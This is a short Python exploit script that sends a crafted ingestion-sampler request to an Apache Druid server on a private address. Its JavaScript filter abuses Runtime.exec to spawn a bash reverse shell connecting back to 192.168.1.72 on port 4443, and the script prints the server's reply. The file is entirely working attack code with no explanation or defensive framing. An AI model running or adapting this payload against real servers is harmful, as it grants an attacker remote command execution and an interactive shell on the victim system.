import requests

url = "http://192.168.1.67:8888/druid/indexer/v1/sampler"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Content-Type": "application/json",
}

data = {
    "type": "index",
    "spec": {
        "ioConfig": {
            "type": "index",
            "inputSource": {
                "type": "inline",
                "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"
            },
            "inputFormat": {"type": "json", "keepNullColumns": True},
        },
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {"column": "timestamp", "format": "iso"},
            "dimensionsSpec": {},
            "transformSpec": {
                "transforms": [],
                "filter": {
                    "type": "javascript",
                    "dimension": "added",
                    "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.1.72/4443 0>&1')}",
                    "": {"enabled": True},
                },
            },
        },
        "type": "index",
        "tuningConfig": {"type": "index"},
    },
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000},
}

response = requests.post(url, headers=headers, json=data)

print(response.text)
